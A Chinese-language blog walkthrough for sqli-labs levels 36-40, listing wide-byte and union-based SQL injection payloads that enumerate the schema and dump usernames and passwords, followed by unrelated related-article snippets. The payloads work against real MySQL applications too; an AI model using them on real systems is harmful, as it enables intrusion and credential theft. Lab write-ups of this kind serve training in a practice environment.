sqli-labs靶场通关攻略（36-40关）

sqli-labs靶场通关攻略（36-40关）

news/2024/9/18 15:11:37/ 标签: 数据库

第36关（宽字节注入（Bypass MySQL Real Escape String））

查数据库

?id=-1%df%27%20union%20select%202,database(),3%20--+

查表

?id=-1%df' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1%df' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1%df' union select 1,group_concat(username,password),3 from users --+

第37关（post宽字节注入（MySQL_real_escape_string））

我们这关要用到抓包工具进行抓包，因为这关是post注入嘛

登录的时候进行抓包

查库

%df' union select 1,database() --+

查表

%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() --+

查列

%df' union select 1,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

%df' union select 1,group_concat(username,password)from users--+

第38关(联合查询/也可堆叠注入)

查库

?id=-1' union select 1,database(),3 --+

查表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema= database() and table_name=0x7573657273 --+

查数据

?id=-1' union select 1,group_concat(username,password),3 from users --+

第39关（联合查询）

查数据库

?id=-1 unin select 1,database(),3 --+

查表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273

查数据

?id=-1 union select 1,group_concat(username,password),3 from users --+

第40关（ ') 闭合）

查数据库

?id=-1') union select 1,database(),3 --+

查表

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

查列

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

查数据

?id=-1') union select 1,group_concat(username,password),3 from users --+

http://www.ppmy.cn/news/1517211.html

相关文章

图片生成box-shadow并下载

图片生成box-shadow并下载

把图片生成由box-shadow拼接成的阴影组成的图片 html <!DOCTYPE html> <html lang"en"><head><meta charset"UTF-8" /><meta name"viewport" content"widthdevice-width, initial-scale1.0" /><titl…

阅读更多...

【焕新】同为科技(TOWE)23周年庆典

【焕新】同为科技(TOWE)23周年庆典

每年的8月23日，都是一个值得铭记、守护、欢庆的日子。这一天同为科技（TOWE）迎来公司成立23周年纪念日，是属于TOWE品牌向前、长远的里程碑。从2001到2024，从品牌与文化，从产品到服务。同为科技（…

阅读更多...

Python自动化办公2.0 课程更新

Python自动化办公2.0 课程更新

之前的课程，包含了Python pandassklearn 数据分析，和Stremlit 可视化仪表盘的开发和一系列自动化项目案例的开发，包括我们封装了ztl-uia 模块，可以同时自动化操控windows 软件和浏览器, 封装的模块，针对为付费学员使…

阅读更多...

【AI模型：追求全能还是专精？】

【AI模型：追求全能还是专精？】

💓 博客主页：倔强的石头的CSDN主页 📝Gitee主页：倔强的石头的gitee主页 ⏩ 文章专栏：《热点时事》期待您的关注目录引言编辑一：AI模型的全面评估和比较二：AI模型的专精化和可扩展性…

阅读更多...

微软正式确认将在近期关闭经典Windows控制面板

微软正式确认将在近期关闭经典Windows控制面板

微软在不断测试并为 Windows 添加新功能的同时，也在不断淘汰一些公司认为不再需要的功能。这些功能会被添加到Windows 过时功能的列表中，最近的一项功能是 Paint 3D，该公司宣布它很快就会被淘汰。与微软似乎希望尽早取消的"3D 画图&quo…

阅读更多...

uniapp video标签无法播放视频

uniapp video标签无法播放视频

当video标签路径含有中文以及特殊字符视频就会无法播放解决方法使用encodeURIComponent对路径进行加密处理 videoSrc data.coursewareFile? ${appConfig.apiUrl encodeURIComponent(data.coursewareFile)}: "";最后效果

阅读更多...

内衣洗衣机和手洗哪个干净？五款高评分内衣洗衣机实测分享！

内衣洗衣机和手洗哪个干净？五款高评分内衣洗衣机实测分享！

在日常生活中，内衣洗衣机已成为现代家庭必备的重要家电之一。选择一款耐用、质量优秀的内衣洗衣机，不仅可以减少洗衣负担，还能提供高效的洗涤效果。然而，市场上众多内衣洗衣机品牌琳琅满目，让我们往往难以选择。那么&a…

阅读更多...

增材制造（3D打印）：为何备受制造业瞩目？

增材制造（3D打印）：为何备受制造业瞩目？

在科技浪潮的推动下，增材制造——即3D打印技术，正逐步成为制造业领域的璀璨新星，吸引了航空航天、汽车、家电、电子等众多行业的目光。那么，是什么让3D打印技术如此引人注目并广泛应用于制造领域？其背后的核心优势又是…

阅读更多...

应用软件初始化的优缺点，读写ini，json，xml...

应用软件初始化的优缺点，读写ini，json，xml...

读写 INI 文件和读写 JSON 文件是两种常见的数据存储方式，它们各自有不同的优缺点，适用于不同的应用场景。以下是它们的一些比较： 读写 INI 文件优点： 人类可读性：INI 文件格式简单，易于人类阅读和编辑…

阅读更多...

2024前端面试题-js篇

2024前端面试题-js篇

1.js有哪些数据类型基础数据类型：string,number,boolean，null，undefined，bigInt，symbol 引用数据类型：Object 2.js检测数据类型的方式 typeof：其中数组、对象、null都会被判断为object&…

阅读更多...

Jupyter 的可视化 Debug

Jupyter 的可视化 Debug

Jupyter 这种工具虽然有很好的交互性能，但其也明白，对于大型代码库，最好还是用传统的 IDE 比较靠谱。因此为了弥补这一缺陷，Jupyter 项目在过去几年也希望通过 JupyterLab 来加强对大型代码库的处理过程。然而，Jup…

阅读更多...

vue中实现图片裁剪

vue中实现图片裁剪

在现代Web应用中，图片处理是一个常见的需求。本文将介绍如何使用Vue.js结合Cropper.js实现一个简单的图片裁剪功能。以下是实现该功能的完整代码。代码实现 <template><div class"c-copper-container" :class"{wd260 : type articlesub…

阅读更多...

零知识证明-非对称加解密算法(三)

零知识证明-非对称加解密算法(三)

前言非对称加解密算法 ，就有对称加解密算法 1:对称算法定义对称算法，加解密双方使用一个密钥。即加密秘钥和解密秘钥相同。对称加密又分为：分组加密和流加密分组加密分组加密是每次只能处理特定长度的一块数据的一类密码算法&#xff0…

阅读更多...

WPF 手撸插件五消息总线

WPF 手撸插件五消息总线

虽然暂时不知道该如何将消息总线集成到插件系统中，但是让我先学习起来吧，本文主要来说说我最近学习的Reface.EventBus Reface.EventBus有两个版本，分别支持.Net Framework和 .Net Core。我们这里先说支持.Net Framework的版本，先…

阅读更多...

【问题记录】mysql报错，mysql2 和 mysql 5.

【问题记录】mysql报错，mysql2 和 mysql 5.

错误2 和错误5 都是由于注册表有问题： 由于我之前安装过MySQL，导致之前的配置没有删除。解决： 搜索打开注册表编辑器： 注册表中找到MySQL: 修改路径： "D:\develop\mysql-8.0.39-winx64\bin\mysqld&quo…

阅读更多...

边缘物联网平台AIoTedge推荐

边缘物联网平台AIoTedge推荐

AIoTedge是一个创新的智能边缘计算平台，它通过边云协同的架构设计，实现了多点部署和分布式计算，提高了数据处理的速度和效率，同时确保了数据的安全性和隐私性。平台具备强大的分布式AIoT处理能力，适用于多种场景&#…

阅读更多...

【中学教资-信息技术】图像/音频/视频文件大小的计算

【中学教资-信息技术】图像/音频/视频文件大小的计算

图像/音频/视频文件大小的计算 1 图像文件2 音频文件3 视频文件4 例题5 总结视频讲解：音频文件大小/视频文件大小计算-失舵之舟 1 图像文件压缩比原始大小/被压缩之后大小颜色深度：指图像中每个像素所占的二进制位数（bit） n位…

阅读更多...

linux查看系统安装时间命令,找出Linux操作系统（OS）安装日期和时间

linux查看系统安装时间命令,找出Linux操作系统（OS）安装日期和时间

你可能想知道你的计算机上何时安装了Linux操作系统，即OS的安装日期和时间，使用tune2fs、dumpe2fs、ls、basesystem、setup、setuptool命令能出来结果。请注意，如果你从模板安装了操作系统，那么它将显示模板生成日期，而不是实际操作系统安装日期。方法1：如何使用tune2fs…

阅读更多...

Solidity入门——receive()和fallback()以及交易数据的简单介绍和运用

Solidity入门——receive()和fallback()以及交易数据的简单介绍和运用

如何运用payable和transfer发送交易在以太坊智能合约中，payable关键字和.transfer()方法它们在智能合约中是如何被使用的。 payable关键字 payable关键字用于声明合约或函数可以接受以太币。当你在一个函数或合约前面加上payable修饰符时，你允许该函…

阅读更多...

java程序优化

java程序优化

Java程序的性能优化是一个复杂但非常重要的过程，它涉及多个方面。首先，我们需要识别性能瓶颈的具体位置，这通常可以通过性能分析工具（如JProfiler, VisualVM等）来完成。以下是一些通用的优化策略： 代码层面…

阅读更多...

最新文章